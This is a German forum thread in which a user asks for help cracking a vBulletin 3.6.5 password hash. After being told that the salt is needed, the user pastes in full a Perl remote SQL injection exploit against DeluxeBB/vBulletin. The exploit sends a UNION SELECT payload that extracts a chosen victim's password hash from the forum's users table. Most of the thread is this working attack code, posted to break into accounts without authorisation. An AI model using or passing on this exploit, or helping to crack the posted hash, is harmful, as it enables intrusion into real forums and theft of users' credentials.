amMaster
11.10.2008, 13:10
hi
brauche hilfe diesen hash zu kracken von vBulletin 3.6.5
e3af04e7e86be8039a7d4bd96a0316f5
thx for help
ohne dazugehörigen salt kommste net wirklich weit
Was gegen doppelte Hashs
wird hier oft mit doppelpunkt dahintergeschrieben
http://de.wikipedia.org/wiki/Salted_Hash
amMaster
11.10.2008, 18:18
ok das hab ich verstanden aber woher bekomme ich diesen salt her?
habe diesen perl exploit benutzt
#!/usr/bin/perl
use IO::Socket;
print q{
################################################## ####
# DeluxeBB Remote SQL Injection Exploit #
# vbulletin Remote SQL Injection Exploit #
# // SekoMirza // Turkish Hackerz #
################################################## ####
};
if (!$ARGV[2]) {
print q{
Usage: perl dbbxpl.pl host /directory/ victim_userid
perl dbbxpl.pl www.somesite.com /forum/ 1
};
}
$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
print
"------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print
"------------------------------------------------------------------------------------------------\r\n\r\n";
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .=
"misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0 ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_use rs%
20WHERE%20(uid='".$user ;
print "[~] PREPARE TO CONNECT...\r\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server",
PeerPort => "80") || die "[-] CONNECTION FAILED";
print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";
print "--[ REPORT
]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "Password Hash is: ".$1."\r\n";
print
"--------------------------------------------------------------------------------------\r\n";
}
exit();
}
}
print
"------------------------------------------------------------------------------------------------\r\n";
################################################## #######
#Shoutz: #
# #
# My Sweet -> Caramel #
# For Mp3s -> Hypn0sis #
# For Support -> [WwW.StarHack.Org] #
# My Bro -> PhantomOrchid #
# My Preceptor -> Earnk Kazno #
################################################## #######
Powered by vBulletin® Copyright ©2024 Adduco Digital e.K. und vBulletin Solutions, Inc. Alle Rechte vorbehalten.